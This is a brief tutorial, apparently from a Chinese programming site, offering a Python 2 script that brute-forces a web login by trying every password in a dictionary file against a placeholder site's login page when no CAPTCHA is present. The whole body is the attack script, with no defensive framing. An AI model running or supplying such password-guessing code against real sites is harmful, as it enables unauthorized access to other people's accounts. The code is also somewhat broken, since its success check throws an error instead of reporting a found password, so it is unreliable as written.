According to the dictionary file, use python to perform brute force cracking. The procedure is very simple
Note: For the case where there is no verification code
Example code:
#encoding=utf-8 import httplib,urllib conn = httplib.HTTPConnection("www.xxx.cn") f=open("dict.txt") while 1: pwd=f.readline().strip() if not pwd: print '字典已比对完。' break params = urllib.urlencode({'username': 'xxx', 'mod': '', 'password': pwd}) headers = {"Content-type": "application/x-www-form-urlencoded","Accept": "text/plain"} conn.request("GET", "/login/aaa.asp", params, headers) r = conn.getresponse() print r.status, r.reason data1 = r.read().decode('gbk')#编码根据实际情况酌情处理 print data1.index(u'您输入的密码有误'),'您输入的密码\'%s\'有误'%pwd conn.close()
![[Web front-end] Node.js quick start](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
